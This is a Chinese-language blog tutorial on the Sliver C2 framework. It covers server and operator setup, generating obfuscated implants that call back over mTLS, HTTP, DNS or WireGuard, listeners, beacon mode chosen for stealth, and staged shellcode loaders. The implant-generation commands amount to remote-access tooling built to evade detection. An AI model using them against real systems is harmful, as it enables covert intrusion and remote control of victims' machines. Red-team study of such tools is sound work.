玉 - Sliver - zha0gongz1
2023-2-2 17:31:0 Author: www.cnblogs.com(查看原文) 阅读量:34 收藏

基操

1.启动服务端

./sliver-server_linux

2.启用多客户端协同

new-operator --name zha0gongz1 --lhost [serverip] #生成客户端配置文件

此时会在同级目录下生成zha0gongz1_192.168.123.23.cfg配置文件。该配置文件为校验信息,使用ECC非对称加密算法实现登录通信,如图:

知识点:服务端默认监听的端口为31337,修改默认端口: vim ~/.sliver/configs/server.json

3.客户端配置

拷贝该配置文件到客户端,运行对应的客户端文件导入配置文件:

Linux:
./sliver-client_linux import /root/tool/zha0gongz1_192.168.123.23.cfg

windows:
sliver-client_windows.exe import /root/tool/zha0gongz1_192.168.123.23.cfg

macos:
sliver-client_macos import /root/tool/zha0gongz1_192.168.123.23.cfg

然后再运行客户端文件即可

4.载荷生成

命令格式如下:

generate --mtls <Server IP> --save ./test.exe --os Windows

支持协议:Mutual TLS协议、http协议、DNS协议、WireGuard协议

生成时默认使用garble(旧版本使用gobfuscate)对implant源码进行混淆,防止被分析。可以使用 --skip-symbols参数禁用混淆。

知识点:gobfuscate,在源码层面修改变量以及代码结构,速度比较慢;garble是对中间编译环节进行混淆结构,速度较快也能混淆大部分符号等信息。

5.开启监听

如上一步,我们生成shell所用的监听协议为mtls,故我们要配置mtls类型的监听。

控制台执行命令

mtls

通过输入jobs命令,可以查看目前开启的监听。

默认端口是8888 如果要指定端口,执行命令:

mtls -l 9999

查看生成过的implant:

implants

6.运行攻击载荷

执行后,服务端和客户端都会得到如下会话消息,主要包含session id、外网IP、主机名、平台、时间等。

7.会话操作

use id          #进入会话
sessions -i id  #进入会话
sessions -k id  #结束会话

通过help命令,我们可以得到相关的执行命令

进阶

攻击载荷

模式分类

Sliver 设计的 Implants 具备两种模式:session 模式(默认) 和 beacon 模式,区别在于beacon 模式属于异步通信方式,即执行累计的任务后,定期连接服务端返回数据,该模式与CobaltStrike 的通信方式相同,而 session 模式则进行持久连接,前者通信更加隐蔽,后者执行命令响应速度更快。当前 Implants 可由 beacon 模式切换至 session 模式,反之的功能官方尚未实现。

#生成beacon模式的攻击载荷
generate beacon --http 192.168.233.231 --save ~/

通信分类

Sliver 的通信方式有很大创新,相较于行业内流行C2新增加的通信方式有 MTLS(交互身份验证协议)和 WireGuard(VPN 协议),这两种通信方式都十分隐蔽,不容易被流量设备检测发现。

另外,Sliver 开发了一个多协议多 ioc 控制功能,即可以使用多种通信方式不同的ioc 进行控制,避免生成的单一通信或者ioc 连接失败。通信协议顺序优先级由高到低依次为 MTLS -> WG -> HTTP(S)-> DNS。

#创建多通信:
generate --mtls example.com --http foobar.com --dns 1.ss.org

#多ioc随机连接:
generate --mtls foo.com,bar.com,baz.com --strategy r

无阶段加载方式

Implant

使用generate命令在C2服务器上生成Implant,可以使用help generate命令查看详细介绍。以下是比较重要的参数选择:

--mtls 192.168.233.231: 指定implant使用相互验证的TLS协议连接到 Sliver服务器。其他选项如`--wg`用于 WireGuard连接,`--http`用于 HTTP(S)连接或`--dns`用于基于DNS的C2连接。

--os windows: 指定在Windows上运行的implant程序(默认设置),同时也支持生成 MacOS 和 Linux的攻击载荷。

--arch amd64: 指定64位攻击载荷(也是默认值,可以省略)。使用`--arch 386`作为32位版本。

--format exe: 指定为exe可执行文件(同样是默认值),其他选项包括针对动态库的 `--format shared`、Windows 服务二进制文件的`--format service`(可与 psexec 命令一起使用)和 shellcode(仅限 Windows)。

--save /home/kali/Tool/Sliver: 指定生成文件存放的目录位置

命令示例:

> generate --mtls 192.168.233.231 --os windows --arch amd64 --format exe --save /home/kali/Tool/Sliver

阶段加载方式

Stager

Sliver implant是用Go语言编写的,而Go二进制文件的体积是众所周知的大。implant包含许多功能,但是它的大小有10MB作用,将来可能会更大,而一个stager可以只有几KB甚至简短几行的二进制代码。所以,在某些场景中,为了尽量降低暴露风险,使用stager更为妥当。

stager的工作方式比较简单(参见官方文档)。首先,在控制台中创建一个配置文件profile,定义implant基本配置。 然后,为其创建一个“stage监听器”(为第二阶段植入shellcode提供服务),监听器可以通过TCP连接或通过HTTP(S)为其提供服务。最后,就是在目标机器下载并运行shellcode。

对于Stager,可以通过C/C++、Go、Rust等语言自定义构造加载器来加载运行,并最终植入implant,进行后渗透操作。

结语

本文偏重教程,也是我实践学习过程中的记录,文中如有不妥之处,还望多斧正。随着Sliver团队不断完善,更新学习仍会继续...


文章来源: https://www.cnblogs.com/H4ck3R-XiX/p/17080163.html
如有侵权请联系:admin#unsafe.sh